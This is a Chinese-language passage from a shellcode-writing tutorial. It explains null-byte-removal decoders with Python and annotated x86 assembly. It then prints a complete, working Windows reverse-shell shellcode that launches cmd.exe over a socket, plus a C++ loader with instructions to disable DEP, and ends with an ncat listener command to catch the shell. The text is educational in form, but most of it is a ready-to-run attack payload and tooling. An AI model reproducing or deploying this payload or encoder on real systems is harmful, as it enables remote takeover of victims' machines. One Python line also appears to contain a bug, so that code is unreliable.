        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL,
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]

    return ”.join([chr(x) for x in code]) + shellcode.replace(‘\0’, chr(missing_byte))

“`

逐字节地分析`shellcode`并了解下这是否为被忽略的值，即从不出现在`shellcode`中的值。我们来了解下值`0x14`.如果我们用该值替换在`shellcode`中的每个`0x00`，那么`shellcode`将不再含有`null`字节，但是会因为被修改了而无法执行。最后是将一些`decoder`添加到`shellcode`，在运行时时，在原`shellcode`被执行前将重置null字节。如下：

“`
CALL $ + 4                                  ; PUSH “here”; JMP “here”-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = “here”
  MOV ECX,
  XOR ECX,     ; ECX = shellcode length
  ADD EDI, shellcode_begin – here             ; EDI = absolute address of original shellcode
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop1:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of the shellcode
  CMP AL,                       ; is AL the special byte?
  CMOVE EAX, ESI                              ; if AL is the special byte, then EAX = 0
  STOSB                                       ; overwrite the current byte of the shellcode with AL
  LOOP loop1                                  ; DEC ECX; if ECX > 0 then JMP loop1
shellcode_begin:

“`

这里有两个需要重点讨论的细节。首先，该代码不能含有`null`字节，因为我们需要另一段代码来移除他们

![enter image description here](http://ttp//drops.wooyun.org/wp-content/uploads/2015/09/2.png)

正如你看到的，`CALL`指令不会跳转到`here`，因为操作码（`opcode`）

“`
E8 00 00 00 00 # CALL here

“`

包含四个`null`字节. 因为`CALL` 指令为 5个字节, 所以`CALL here`指令等价于`CALL $+5`.除去`nul`l字节的技巧是使用指令 `CALL $+4`：

“`
E8 FF FF FF FF # CALL $+4

“`

那CALL跳过4个字节并jmp到CALL本身的最后一个FF。由字节C0紧接着CALL指令，因此在CALL指令执行之后该指令INC EAX对应的操作码FF C0会被执行。注意CALL指令中已压入栈的值仍然是here标记的绝对地址

这是除去null字节的第二种技巧：

MOV ECX,XOR ECX,

我们可以只是使用：

MOV ECX,

但是这将不会生成null字节。而实际上，shellcode的长度为0x400，我们将会看到该指令

B9 00 04 00 00 MOV ECX, 400h

存在3个null字节。

为了避免存在该问题，我们选择使用一个不会出现在`00000400h`中的`non-null`字节。我们选择使用`0x01`.现在我们计算如下：

“`
= 00000400h xor 01010101 = 01010501h
= 01010101h

“`

在指令中使用`` 和 ``对应的操作码都不存在`null`字节，并且在执行`xor`操作后，生成的原始值为`400h`。

对应的两条指令将会是：

“`
B9 01 05 01 01 MOV ECX, 01010501h
81 F1 01 01 01 01 XOR ECX, 01010101h

“`

通过函数 `get_xor_values`来计算`xor`值。

正如以上提到过的，该代码很容易理解：通过逐字节检查`shellcode`来用特定的值（`0x14`，在之前的范例中）覆写`null`字节。

#### 从shellcode中移除null字节(II)

如上的方法会失败，因为我们不能找到从不在`shellcode`中出现过的字节值。如果失败了，我们需要使用`get_fixed_shellcode`，但是它更为复杂。

方法是将`shellcode`分为多个`254`字节的块。注意每个块必须存在一个 “`missing byte`”，因为一个字节可以具有`255`个非0值。我们可以对每个块进行逐个处理来为每个块选择`missing byte`。但是这样做可能效率不高，因为对于一段具有`254*N`个字节的`shellcode`来说，我们需要在`shellcode（`存在识别`missing bytes`的`decoder`）被处理之前或之后存储N个 “`missing bytes`”。最有效的做法是，为尽可能多个254字节的块使用相同的“`missing bytes`”。我们从`shellcode`的起始部分开始对块进行处理，直到处理完最后一个块。最后，我们会有``配对的列表：

“`
[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), …]

“`

我已决定将`num_blocksX`限制为一个单一字节，因此，`num_blocksX` 的值会在1到255之间。

此处是`get_fixed_shellcode`部分，该部分将`shellcode`分为多个块。

“`
def get_fixed_shellcode(shellcode):
    ”’
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn’t work with this shellcode.
    ”’

    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, …]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:         num_blocks = 0         missing_bytes = list(range(1, 256))         # Tries to find as many 254-byte contiguous blocks as possible which misses at         # least one non-null value. Note that a single 254-byte block always misses at         # least one non-null value.         while True:             if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                bytes += [missing_bytes[0], num_blocks]
                break

“`

就像之前，我们需要讨论在`shellcode`起始部分提前准备好的“`decoder`”。该`decoder`的代码比之前的更长，但是原理相同。

这里是代码:

“`
code = ([
    0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                        # bytes:
    bytes_blocks + [                                    #   …
                                                        # skip_bytes:
    0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                        # here:
    0xC0,                                               #   (FF)C0 = INC EAX
    0x5F,                                               #   POP EDI
    0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX,
    0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX,
    0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes – here)]
    0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin – here
                                                        # loop1:
    0xB0, 0xFE,                                         #   MOV AL, 0FEh
    0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
    0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
    0x33, 0xF6,                                         #   XOR ESI, ESI
    0xFC,                                               #   CLD
                                                        # loop2:
    0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
    0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
    0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
    0xAA,                                               #   STOSB
    0x49,                                               #   DEC ECX
    0x74, 0x07,                                         #   JE shellcode_begin
    0x4A,                                               #   DEC EDX
    0x75, 0xF2,                                         #   JNE loop2
    0x43,                                               #   INC EBX
    0x43,                                               #   INC EBX
    0xEB, 0xE3                                          #   JMP loop1
                                                        # shellcode_begin:
])

“`

`bytes_blocks`是数组：

“`
[missing_byte1, num_blocks1, missing_byte2, num_blocks2, …]

“`

我们在之前已经讨论过，但是没有配对。

注意代码始于跳过`bytes_blocks`的`JMP SHORT`指令。为了实现该操作，`len(bytes_blocks)`必须小于或等于`0x7F`。但是正如你所看到的，`len(bytes_blocks)` 也出现在另一条指令中：

“`
0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF, # LEA EBX, [EDI + (bytes – here)]

“`

这里要求`len(bytes_blocks)` 小于或等于`0x7F – 5`，因此这是决定性的条件。如果条件违规，则：

“`
if len(bytes_blocks) > 0x7f – 5:
# Can’t assemble “LEA EBX, [EDI + (bytes-here)]” or “JMP skip_bytes”.
return None

“`

进一步审计代码：

“`
JMP SHORT skip_bytes
bytes:
  …
skip_bytes:
  CALL $ + 4                                  ; PUSH “here”; JMP “here”-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = absolute address of “here”
  MOV ECX,
  XOR ECX,     ; ECX = shellcode length
  LEA EBX, [EDI + (bytes – here)]             ; EBX = absolute address of “bytes”
  ADD EDI, shellcode_begin – here             ; EDI = absolute address of the shellcode
loop1:
  MOV AL, 0FEh                                ; AL = 254
  MUL AL, BYTE PTR [EBX+1]                    ; AX = 254 * current num_blocksX = num bytes
  MOVZX EDX, AX                               ; EDX = num bytes of the current chunk
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop2:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of shellcode
  CMP AL, BYTE PTR [EBX]                      ; is AL the missing byte for the current chunk?
  CMOVE EAX, ESI                              ; if it is, then EAX = 0
  STOSB                                       ; replaces the current byte of the shellcode with AL
  DEC ECX                                     ; ECX -= 1
  JE shellcode_begin                          ; if ECX == 0, then we’re done!
  DEC EDX                                     ; EDX -= 1
  JNE loop2                                   ; if EDX != 0, then we keep working on the current chunk
  INC EBX                                     ; EBX += 1  (moves to next pair…
  INC EBX                                     ; EBX += 1   … missing_bytes, num_blocks)
  JMP loop1                                   ; starts working on the next chunk
shellcode_begin:

“`

### 测试脚本

这部分会简明易懂！如果没有任何参数，运行脚本将会显示如下：

“`
Shellcode Extractor by Massimiliano Tomassoli (2015)

Usage:
sce.py

“`

如果你还记得，我们也已经告诉过`VS 2013`的`linker`生成一个映射文件。只调用具有`exe`文件及映射文件路径的脚本。此处是从反向`shellcode`中得到的信息：

“`
Shellcode Extractor by Massimiliano Tomassoli (2015)

Extracting shellcode length from “mapfile”…
shellcode length: 614
Extracting shellcode from “shellcode.exe” and analyzing relocations…
Found 3 reference(s) to 3 string(s) in .rdata
Strings:
ws2_32.dll
cmd.exe
127.0.0.1

Fixing the shellcode…
final shellcode length: 715

char shellcode[] =
“\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01”
“\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa”
“\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05”
“\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83”
“\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8”
“\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc”
“\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01”
“\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70”
“\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73”
“\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8”
“\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01”
“\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05”
“\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98”
“\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84”
“\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85”
“\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02”
“\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05”
“\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24”
“\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d”
“\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54”
“\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66”
“\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57”
“\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24”
“\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2”
“\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d”
“\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52”
“\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0”
“\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05”
“\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33”
“\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb”
“\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0”
“\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14”
“\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b”
“\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8”
“\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78”
“\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b”
“\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc”
“\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff”
“\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89”
“\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f”
“\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48”
“\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6”
“\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73”
“\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65”
“\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05”;

“`

重点在于重定位信息，因为可以根据它来检查一切是否OK。例如，我们了解到反向shell使用3个字符串来实现，并且它们是从`.rdata`节中提取的。我们可以了解到原始`shellcode`为614个字节，同时也了解到已生成的`shellcode`（在处理了重定向信息以及`null`字节之后）为715字节。

现在需要运行已生成的`shellcode`。此处是完整的源码：

“`
#include
#include

// Important: Disable DEP!
//  (Linker->Advanced->Data Execution Prevention = NO)

void main() {
    char shellcode[] =
        “\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01”
        “\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa”
        “\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05”
        “\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83”
        “\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8”
        “\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc”
        “\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01”
        “\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70”
        “\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73”
        “\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8”
        “\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01”
        “\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05”
        “\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98”
        “\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84”
        “\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85”
        “\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02”
        “\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05”
        “\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24”
        “\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d”
        “\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54”
        “\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66”
        “\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57”
        “\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24”
        “\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2”
        “\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d”
        “\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52”
        “\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0”
        “\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05”
        “\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33”
        “\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb”
        “\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0”
        “\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14”
        “\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b”
        “\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8”
        “\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78”
        “\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b”
        “\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc”
        “\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff”
        “\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89”
        “\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f”
        “\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48”
        “\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6”
        “\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73”
        “\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65”
        “\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05”;

    static_assert(sizeof(shellcode) > 4, “Use ‘char shellcode[] = …’ (not ‘char *shellcode = …’)”);

    // We copy the shellcode to the heap so that it’s in writeable memory and can modify itself.
    char *ptr = new char[sizeof(shellcode)];
    memcpy(ptr, shellcode, sizeof(shellcode));
    ((void(*)())ptr)();
}

“`

此时需要关闭DEP（`Data Execution Prevention`)来让该段代码成功地被执行，通过`Project→ Properties` 然后在 `Configuration Properties`下, `Linker and Advanced`, 将 `Data Execution Prevention`(DEP) 设为 `No (/NXCOMPAT:NO)`。因为`shellcode`将会在堆中被执行，所以开启了`DEP`会导致`shellcode`无法被执行。

`C++11`(因此需要`VS 2013 CTP`)标准中介绍了`static_assert` ，使用如下语句来检查

“`
char shellcode[] = “…”

“`

而不是

“`
char *shellcode = “…”

“`

在第一个案例中，`sizeof(shellcode)`表示`shellcode`的有效长度，此时`shellcode`已经被复制到栈上了。在第二个案例中，`sizeof(shellcode)` 只是表示指针`(i.e. 4)`的大小，并且该指针指向在`.rdata`节中的`shellcode`。

可以打开`cmd shell`来测试`shellcode`：

“`
ncat -lvp 123

“`

接着运行shellcode并观察它是否被成功执行。

文章版权归作者所有，未经允许请勿转载。